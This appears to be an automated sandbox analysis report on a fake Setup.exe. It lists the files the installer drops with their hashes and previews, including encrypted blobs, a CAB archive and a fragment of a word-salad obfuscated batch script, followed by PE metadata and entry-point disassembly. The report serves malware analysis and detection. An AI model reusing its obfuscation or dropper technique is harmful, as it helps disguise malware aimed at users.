                                                                                                                                                                            SSDEEP:12288:t6AeE6lWq91imJDqI6tPEB+F1ifKoxWr7BBq1Lam96enbyT+:UAeLUqiwN6mBisqdI1CwbyT+
                                                                                                                                                                            MD5:C8ACBB75E41F0AC9B823198839006A5B
                                                                                                                                                                            SHA1:5E5145FAEAAED8059D6A2D9218B26972E6E012B8
                                                                                                                                                                            SHA-256:3E29497D7F1D6877C073933ACFADDBBC794EE1723E25EBEFE290BBC7BB34D671
                                                                                                                                                                            SHA-512:903B3C71D424FD7248C0775D058FE41D83E8E67941FB50FBA92F64D05BDF25A2C2D8B1DC93C071525D53D13F79F27AE0036A440E7E74B14B9BBBD5FB01100D97
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MSCF....+t......,...................5..................Y2. .Brunette............Y2. .Consist............Y2. .Immediately............Y2. .Luxury.. .........Y2. .Airplane..0.........Y2. .Sun..T.........Y2. .Earnings......$.....Y2. .Placing..'.........Y2. .Distinction.]..........Y2. .Lance..h..^......Y2. .Like....!.#..CK....[.y...8g"S..!-.(p....a..x..;Ig.twB.........$Ez:..7......z.8...!.q..R.8.8..q......C]....q2..C)......d..n...........$.V.....H.W...)Q.z..^..A.]...U....T.....U...E>.&..E.B.Qe..W.j..V..QT.D?.~.....hl.<:9.+..Ma+...v..W..sr...f....I,j.y.....L..6.Hl._.y.}.C..Y..}............B.O.>......:....S..W.v...>...Q......K.....z..^+u33{.s.L...Q.5m7..M{a..(.Y.5.&u,*.....)5H."#)....z...S.Z..^'.BX......Ar..>|..h...).....w....u.g.......&_..v.9.2..)..../.W..w..~.W.._....s.....V#......Q..jt?#q...J.!Z..q....1..B.y......JQ.%.!n....G..e.K....O..}....bH..l..3k.F"..t.ZO.Mj.cOc..u....k.b.V..gI.|.~;.p.;%....\.d...D{N...+...,...FYF..P...JT4.....!q4.#.1+.w".l.
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):125952
                                                                                                                                                                            Entropy (8bit):6.649590989057659
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:s80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRt9:RSCOMVIPPL/sZ7HS3zc9
                                                                                                                                                                            MD5:0B8BEFA0353A182791FD6940040A9D59
                                                                                                                                                                            SHA1:969AD9C6DDD6EB46DA51CE990B552D5E48D9773F
                                                                                                                                                                            SHA-256:397EA5D9A9A70181A6A334FB298B8F4BC2C62802E730CD905E9D7E9A2D6D76D2
                                                                                                                                                                            SHA-512:26B321360220180D515ED9BEB67F3BB9DE704423E0DED283039A86E344C4E84DE71341A402E331ED4ECA4233400FD207BF5F6A67BF3603A1E4706AB96B605215
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.....D$..T$..D$...}.G.T$........D$..T$...u(.L$..D$.3....D$.......d$.....d$....G..L$..T$..D$...........u.....d$...D$.....r.;T$.w.r.;D$.v.N+D$..T$.3.+D$..T$.My.............Ou.......]^_....WVS3..D$...}.G.T$........D$..T$..D$...}.G.T$........D$..T$...u..L$..D$.3....D$.....A..L$..T$..D$...........u.....d$...D$.....r.;T$.w.r.;D$.v.N3..Ou.......[^_.........Q.L$.+.....#..%....;..r...Y.....$..-...........SW3..D$...}.G.T$........D$..T$..D$...}..T$........D$..T$...u..L$..D$.3...D$....3.OyN.S..L$..T$..D$...........u.....d$...d$...r.;T$.w.r.;D$.v.+D$..T$.+D$..T$.Oy......._[.................Q.L$.+.........Y.....Q.L$.+.........Y.........=4.M..t7U.........$..,.$..=4.M..t.....<$Xf...f...t..$.....I.U... ......T$..|$..l$..T$..D$...t<...y...$..$................T$.....,..$..$..........T$.......T$.......u..\$..\$..............U..W.=4.M.........}.ww..U........f.n...p.........#.....+.3...o.f...f.t.f.t.f...#.u.f...#........E........Sf...#...3.+.#.I#.[.......D._....
                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):89088
                                                                                                                                                                            Entropy (8bit):7.99817329569546
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:1536:X3TeA/W3VLk0p5GkCKbOnVFBTn2Zp9h/OmcWcs5WIx6ZXQHWUFxgbtIKGHCGc9r:XDoQ0p5GBKbOnnBa5h/Om+/GmAqtIxw
                                                                                                                                                                            MD5:7946371D81CDBB48F44BF84C2920119E
                                                                                                                                                                            SHA1:3E2DC295C34E27ADEB0BF1D77D5AF673060B1BB5
                                                                                                                                                                            SHA-256:47DD408466A30EF6B55F197F69871F13CEBF32473DBE7D570F5C7988521837F9
                                                                                                                                                                            SHA-512:72009940E254E2981014C1A8EB1198417B7E80C027D146E8C0D47D18631EC83C5687B724CA4249525339BC33629493FEC7AD31D2A9B766C35819A46EC7B37E33
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:...:.J.8.QA..E..C."...|Y..X...,...C..p......:C....~v.%.E.|.a{.9.W/......0...^.Wu.......y....i.....h....u.tx...$E..C._...^.......7V=B.U...?8.R..U....).^.."^..o...g...86.;..K|.Y...P......J.2S`!.>.q....}...v..{..U...\..Y.....P..#..."..-.%..i.Ed..>UB.,U....8....O`.M.........,.*\.z.....r.....^...bV7f.bS..-.%.....h..L."|....6<..b=.$f..;?;..L.S.j..E......o.=....tU[._.....-/.|-p[o.f&..|......#....E5a|n.(.V..B3....4.O....d..Wu.Ne.:t .!.'.3..Kyh%....,)n.n.h.c....F....+(W.....W.V..t....=..qI]RJ+o\!.J.....PV8..... .M235.yl.......E.5G...........`OO2w.<)...Q......t&......u.s..X..SU..eI-:...c:.%L\...M..V".vE].X.%.v3.k....k.....'?"..]>.K.Z.....5>.~.5.......k(..6v5.3.8..f...oC.y....N?....z2.P..^l.;Faij|5|.:...Q..D'..Z.....4.KC...n..Z...\:Y5....ub]h..@..J.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....
                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (723), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16091
                                                                                                                                                                            Entropy (8bit):5.134979352547264
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:CU+mtTlwtTHvdBbcnm39/xaaU/7aN7v2GakGz:CUlt8HvdpLt/xaaUja73akGz
                                                                                                                                                                            MD5:4EC2F189783F4FF069C71D242E25446C
                                                                                                                                                                            SHA1:108A21C6E21824A06DEB73F8F34F3B58929E3DFF
                                                                                                                                                                            SHA-256:CD80EE277AAF845BB84E6F78C7E7845C4F119E32ED293ADC235C7BF83A160F30
                                                                                                                                                                            SHA-512:69D814791C8E1DCD75EE7E2901691E0982630325B8C06734D056BDF99607794CD9C217F269CADA883F6F2238F34A0250D5E5C3A22B7C75C813B6530E7193B4EE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Set Naturally=j..MCVConsists-..SymwBass-Bicycle-Llc-Came-Farmer-Hispanic-Dispatch-Files-Rip-..AxACircumstances-Him-..HruClassifieds-Downloading-Caps-Powered-Defendant-Nirvana-..GEProcedure-Headers-Individual-Anytime-Disney-Plastics-Area-..WQUmDemo-Characteristics-Habits-..Set Produces=p..YAgReduction-..ZaOPeterson-Guitars-Ronald-Minneapolis-Chemical-..nudDBarn-Racks-Poor-Happened-Ab-..CVwcBehaviour-Chancellor-Neil-Highlight-Ensuring-Worker-..BZReplies-Educators-Vietnam-Ranch-Beaver-..EGRanging-Running-Dedicated-Advantages-Temple-Science-Notes-..MAvRelocation-Bookmark-Assessment-Ethiopia-..YMEBdsm-Screensaver-Mumbai-Assistance-Facing-..LJVWare-Ebay-Frontier-Pre-Smithsonian-Stickers-Cancelled-Public-..Set Quickly=K..qtStadium-Somewhat-Acquisitions-Legacy-Infants-Seeds-Bottles-..iZXYVerification-Af-Bc-Upskirts-Documented-Normally-Collectibles-Ta-Simulations-..IOgsOuter-Abuse-Rn-Use-Fur-Great-..OANDna-Overhead-Hispanic-Directors-Culture-Morgan-Constitute-Azerbaijan-..cvStock-Hall-Transcrip
                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (723), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16091
                                                                                                                                                                            Entropy (8bit):5.134979352547264
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:CU+mtTlwtTHvdBbcnm39/xaaU/7aN7v2GakGz:CUlt8HvdpLt/xaaUja73akGz
                                                                                                                                                                            MD5:4EC2F189783F4FF069C71D242E25446C
                                                                                                                                                                            SHA1:108A21C6E21824A06DEB73F8F34F3B58929E3DFF
                                                                                                                                                                            SHA-256:CD80EE277AAF845BB84E6F78C7E7845C4F119E32ED293ADC235C7BF83A160F30
                                                                                                                                                                            SHA-512:69D814791C8E1DCD75EE7E2901691E0982630325B8C06734D056BDF99607794CD9C217F269CADA883F6F2238F34A0250D5E5C3A22B7C75C813B6530E7193B4EE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Set Naturally=j..MCVConsists-..SymwBass-Bicycle-Llc-Came-Farmer-Hispanic-Dispatch-Files-Rip-..AxACircumstances-Him-..HruClassifieds-Downloading-Caps-Powered-Defendant-Nirvana-..GEProcedure-Headers-Individual-Anytime-Disney-Plastics-Area-..WQUmDemo-Characteristics-Habits-..Set Produces=p..YAgReduction-..ZaOPeterson-Guitars-Ronald-Minneapolis-Chemical-..nudDBarn-Racks-Poor-Happened-Ab-..CVwcBehaviour-Chancellor-Neil-Highlight-Ensuring-Worker-..BZReplies-Educators-Vietnam-Ranch-Beaver-..EGRanging-Running-Dedicated-Advantages-Temple-Science-Notes-..MAvRelocation-Bookmark-Assessment-Ethiopia-..YMEBdsm-Screensaver-Mumbai-Assistance-Facing-..LJVWare-Ebay-Frontier-Pre-Smithsonian-Stickers-Cancelled-Public-..Set Quickly=K..qtStadium-Somewhat-Acquisitions-Legacy-Infants-Seeds-Bottles-..iZXYVerification-Af-Bc-Upskirts-Documented-Normally-Collectibles-Ta-Simulations-..IOgsOuter-Abuse-Rn-Use-Fur-Great-..OANDna-Overhead-Hispanic-Directors-Culture-Morgan-Constitute-Azerbaijan-..cvStock-Hall-Transcrip
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):113664
                                                                                                                                                                            Entropy (8bit):5.9757532889739595
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:iy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAts9:34ZgP0JaAOz04phdy9
                                                                                                                                                                            MD5:B4619D92F2F73914156B195399C4547E
                                                                                                                                                                            SHA1:1824EC15ACED65DE39436EA92F8896E760C56BAE
                                                                                                                                                                            SHA-256:8FA8CC2B893E39889F6AE206F02CCCA9E472B41580A7454C541D22C347FCB1AC
                                                                                                                                                                            SHA-512:E1E8D5DFE9D6686370573739F9BC5B1C5BE49DA7E85A3FF2B7E8D7E6029645EFB23E60A4EBE6373343B5C5CA9D1F965E5141352B4B90FAA684F07D02FA75668A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:....0.F...t.9..)M.u....)M...F.P..<.I..f...}..t#.u..u...@.I..F...4.I.9.u..L)M...)M.^]...U..}..t..u...(M........L)M.....L)M....u.3..-.@)M.......E..AX.E..A\.E...~..A`.E...~..Ad3.@]...U..}..t..u...(M..{......L)M.....L)M....t$.@)M.j.j.j ......E..1.A..E..A.....I.]...U..}..t..u...(M..(......L)M.....L)M....u.3..h.@)M..E.....L.V.....0....D{....L..8....F|....E....t........E....t........Nl;M.t..u...7...E.......3.@^]...U..Q.}..t..u...(M.......L)M.....L)M.VW..........@)M.j.....0..P.E...\.I..}......#.+.....@.E....t.Wj..u...@.I...tb.}..t..u.j..u...@.I...tJ.~8.t?.....3.#.;....9E.t.j.;.u...L.I..FH....L.I.)FHjG3.PPPPP.u.....I.3.@..3._^....U..Q..L)M.V...t..@)M.......0..3..u...(M.....E....tZ.}...L)M.tK.E.P.E.P.u...9....t;.M..@)M.....M....T)M.............u........................3.^....U... W.}...9.ul..:.uf.E.P.E..0....I..E.E.E.E..E.P.7..x.I..E.E.E..E.E.E.E..E..E.P.7..x.I..E..u..E.E..E..E.P.7..X.I._....U..].9..U.....E.SVWP.E.P.u..)8......)....M..@)M..].....M..0.T)M.....8.......E
                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):95232
                                                                                                                                                                            Entropy (8bit):7.997830456340322
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:1536:Co7r/NIc6N+BeIVeWzx2MpTbtnxLCFoAdZW2UbaZU2NipP6LIBvZik6WPf2F90IU:dBIf8BeseW/TFj27ZU+I1ZiRWPf2M
                                                                                                                                                                            MD5:153CFF0DDF850447E2B40CE0FDFA95FA
                                                                                                                                                                            SHA1:854190DFB1E2EB761DB65430F9C36B56B18E1353
                                                                                                                                                                            SHA-256:70E39C54C3CAFB4E8F5A8586DE0A640AB71C876F1C7F097A763616AD9CA777DD
                                                                                                                                                                            SHA-512:CF6D7CA2498BCCBC89A5CDCB4ED7505C8844CB5A363A6F6408EA66F0FA11031B1374BA27F9A705EB05901350D01A1C74B7FA30E26128576DF37B9BE1F8E1BAF7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:i.)m{....QC......I..a5.M.=Bje `.....l.!.L?....)[......-%..o..D.9.k.m'..#z...A.EZ.k.Gf.P.Y#m......PV*..P.Q....W..X..-k........^.S.#....i..5.;..........b).......X.u81p..D^].|.....C!|......ilL.7uX1.1{-X7.g.....e_or..[..n/...k.....+2..F..@..;....MY./7..V$..e.....{^.Y.4.H..f!^....A&.}s.=x..._..=...-.5>.L..(.Y..nf.V.R..bm .C%..#..^..T+}.xOV....!...Y ...\^x.O....m.".;......d...H.j..e...^h....{..7;@..{j......y..Kc.....P&&....I./..i.``n..tCp?..id.O.l..e>.(.%..q../7P...._E...sS.i...S..g.D.o.|.*..DEKj....u1..S.>........h"...W.T...`p.....t......o.R.%\..gX..v^.../#*.!.d.]s...QQb......."...xn1.Xe..X.r......Cy...4..H.\..;.t..T~...2...T f.....d.)..ga...q....G..0tv.1f......2.E.......mW_.7!.....".l>.]A...f.U.o....66.!.g^....<R..~e=H.<[..^...le.W.$..q8..E.iKBQ...`..0.....l.O.fD0D.5K..u|....*.A.......R.[..jUy.yIz..R..A.Y.....XT~0.c...s...R.%../...1.J.I...ww...U......X..I.P.w....@..f...$.v.I.....@..Yz...~t..e.......&....R{;.8n....^E.y..9...L.....
                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):21161
                                                                                                                                                                            Entropy (8bit):7.991486692843784
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:384:3XyXacewvF8s/4klZtRZeCu6fiGtjAJxZ5Hw+6/77sikKpieKGR1Y3PQ6oH5U:Ebewz/9tDeCHLBAHZlzM7Dk95GR1+Ge
                                                                                                                                                                            MD5:17A5BD6837570221A729E238016987E8
                                                                                                                                                                            SHA1:C554EE923215069541B7EFEA6B437F536D85ACBA
                                                                                                                                                                            SHA-256:04773C3E15CE4D3371AD1A6613222E22B008A7FB9B6CBE4F69B3D3426C79E94F
                                                                                                                                                                            SHA-512:255B66D9AF6FDF2D97FEF1BDB6AC956BB3C2B3235E35C7A1988CAAD444511857CFEFCAAEE0F7D8DAECC72BB5BF837C6BAE18489711F4BA68AE2265E5CB8D33DF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.;{>\...8.5Ub.nn......e<..HV3:.....g.)....'O.... .:M.......hrnJ...~u......K...W.....Y.:.`.#.F5.J.bx.^w..h.|......cj.....*G.Z[.ln.j.....5.d...!'..5....\...dJ8..q...._.*..A.~....q.JI...G..o~xKy|...K#`.h..qx!..I.g.<....]...}d.....]..V].PE.~.a.r.9P.AA..*..\..)>..Y]s..i...;..R...sV.A....N.El..u..t.\.*8-)..pK.f.R.[.2..+iq.L.7.|[..W~L9.@.+...H....'.m..i.N.1.......4.........!.....u.T......y......u......\G....k.L...dD..Qy.M...].KK<%.........k.`$.......Z!}..~x..(..h.....y.W."0(..I.....v.C....O.<3./kC..=........jCJ!.9...@.......J.XP7.pX._QC.:._C.(.h5nzREd.l..u..'.xd.B...7...d...l...\...YT...\...%q!..>S/#B.....B&>.{.T5...a<W.65S.w.|.sG(.<^..8.mZ... ......3.....%...:.w.P.i7./...S'A.DNPS.....DPu.8..};4j........lM.Q..U.g......O@...&.......64C.e.5.....N..L.dV........pn.A.td.6..#'...o.2...8..m......#l..D..+..8...\H.A...^..E./h...s..Z ........P.2...`^..^.l...68..W..Y.T\.....l/...WV.s$......?....6z.....+_..eU....^.....D.Bd/..h...MM.aM.I....
                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):62464
                                                                                                                                                                            Entropy (8bit):7.996797481108441
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:1536:bp8MJGsjsYGsE3WfmQmBZFs788hNd754qsj8vA:bpPJRsYGsE3WliZYdhNF5nS9
                                                                                                                                                                            MD5:CDE9634CC5B348EE7B071CB62BEAA3CE
                                                                                                                                                                            SHA1:6EAEC4F48F2F19E409216DE02F8814238B3925EE
                                                                                                                                                                            SHA-256:E034C077B8F9D4F767FC51FAB721D147053E2EF572614E2CC8501C9F06DD0493
                                                                                                                                                                            SHA-512:424C0A474E8480826096836C05461B7A20C67A528D13F192F2A1CB4DA572072381C711FC2772816811655BFE6D6108447964A6C114022847E8E4BAD8D8AD8AC3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:];i.6.\.n......H..~.C..pv.\.p&y..w...'...6..K:.A.r..........v.?X.C...?3(U^..A......w'.?.~...f.-{..(.........S...J.|.....l..V=.p.Op..N..u..I........T....|L.a......s.....P.}k....\.._.u[J".u.Bw.)08.k!t6.c!bE.}.'.#.k..[..`gG.L....1$.&...=..9z...#..cw.3...Fx2.S..z..(....c....9..V...MZ@.).,F.(....F$...v.......:.....Bz.!Yq.=..2...zq.4J(d."lH...v[.~.8f.B.K......1..A.._.L^/....sr).ew......P...8.s.Ivz.&D..2~......EA...=JR..5.GQe.,.67... J:...t..D..|U.G..'.....$.IA......E....np..q.$..o4.qF~?W.6X...........6.....o.e..."4.....c..........,^{oR.a.+.....v".wVB...b..w|X......#r_...=.'........4p.V.t..............."q..#........{..>.*.h(.=kjl..'.+...f.Pg..D.5wx...?..".3"....V..A(..9.$=g.....n;......K....1..U._.#.q.....Y7.tdT.p'...y.3..@.EY.p...Hy;.;.2..j._>..9p.3......gY1$/...L...zv(.E.Nr_.....7.O?yA.......`.S..$...l...R...b..m?.(....r..$...m..x5....V..Bd..&d.5...{..\o...0uy../..Rj6lU.[Of..^.,.L.@J..%...B...?.....CC..K.]...W.3.....<Y..d.../[Et.4lbU.P.
                                                                                                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):77824
                                                                                                                                                                            Entropy (8bit):5.064020555279566
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:CQXoSpu88888888888888888888888888888zv888888NfU84444Qnoooooooook:Vx/SGKAGWRqA60dTcR4qYG
                                                                                                                                                                            MD5:A0AD27D13A6EE64C6B56CDBCCCD46357
                                                                                                                                                                            SHA1:1DFB105A7A253FFABEB313756A660027EFBD87FC
                                                                                                                                                                            SHA-256:1C285FCAF12CCAA31A673FF30642234F785C617B478C2FC0D4382DF04B8A0E4D
                                                                                                                                                                            SHA-512:07D28B6571E67DFAC14A3A4FC64691C5DBD1907E7691E2ACF3C48F25DD7B9AA210438C661430A49CCEF816FC64BDE519C1E03B7873ECF1E8E8048103CFBB7AC9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.r.(.(.(.(.(.(.(.(.*.(.(.(.(.(.(.r.(.(.).).).).).........).).r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.1.2.2.2.2.3.2.2.2.2.2.2.1.2.2.3.3.2.2.0.4.4.4.4.4.4.4.4.4.4.5.5.5.5.5.5.0.0.0.0.0.0.3.3.2.2.0.0.0.0.2.2.2.0.1.1.1.0.0.1.1.1.1.1.1.1.0.0.0.2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.1.3.2.2.1.1.1.1.1.1.2.0.1.4.4.4.4.4.4.4.4.4.4.1.1.1.2.6.6.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.r.7.r.r.r.r.r.7.r.r.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8...9.8.8.8.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Entropy (8bit):4.241175063629575
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                            File name:Setup.exe
                                                                                                                                                                            File size:73'409'776 bytes
                                                                                                                                                                            MD5:7a2ed58357c7dc7a63754e88af43a860
                                                                                                                                                                            SHA1:632930cbe696ee75e3445835258c77e8d27ab426
                                                                                                                                                                            SHA256:984d3e2de76f512c364247b280180d5bd7ed45b4d0c483e10a041943e08730d4
                                                                                                                                                                            SHA512:45fdf09bb9a9f6de000942cb09c1a62f3d1ddff694ededb9c75f604cdd47cd86f4aef4cfbf8f2976f3020900200f282696c916c6f2fabf5efdd5c842491be935
                                                                                                                                                                            SSDEEP:24576:jh04AuiujHsXJpAJ7PaZDIdq/TMMqfiSq8ll6yT7O3H/o7xn+6cUsMnE2:C4AJWJ7aZxF1Sq8llXT7O3Hg7xxsGH
                                                                                                                                                                            TLSH:F1F723AF430CB0BA5EF27C5B2172B59A1222768131F14E0EC5D4DD299BA7960D3363F9
                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                            Icon Hash:ae9ae8e4ecfaaeba
                                                                                                                                                                            Entrypoint:0x4038af
                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:5
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                            Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                            • 24/06/2022 09:22:08 14/04/2025 16:06:58
                                                                                                                                                                            Subject Chain
                                                                                                                                                                            • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
                                                                                                                                                                            Version:3
                                                                                                                                                                            Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
                                                                                                                                                                            Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
                                                                                                                                                                            Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
                                                                                                                                                                            Serial:115BBE9E1C286827AF66E7A01390C206
                                                                                                                                                                            Instruction
                                                                                                                                                                            sub esp, 000002D4h
                                                                                                                                                                            push ebx
                                                                                                                                                                            push ebp
                                                                                                                                                                            push esi
                                                                                                                                                                            push edi
                                                                                                                                                                            push 00000020h
                                                                                                                                                                            xor ebp, ebp
                                                                                                                                                                            pop esi
                                                                                                                                                                            mov dword ptr [esp+18h], ebp
                                                                                                                                                                            mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                            mov dword ptr [esp+14h], ebp
                                                                                                                                                                            call dword ptr [00409030h]
                                                                                                                                                                            push 00008001h
                                                                                                                                                                            call dword ptr [004090B4h]
                                                                                                                                                                            push ebp
                                                                                                                                                                            call dword ptr [004092C0h]
                                                                                                                                                                            push 00000008h
                                                                                                                                                                            mov dword ptr [0047EB98h], eax
                                                                                                                                                                            call 00007F9A9D5149FBh
                                                                                                                                                                            push ebp
                                                                                                                                                                            push 000002B4h
                                                                                                                                                                            mov dword ptr [0047EAB0h], eax
                                                                                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                                                                                            push eax
                                                                                                                                                                            push ebp
                                                                                                                                                                            push 0040A264h
                                                                                                                                                                            call dword ptr [00409184h]
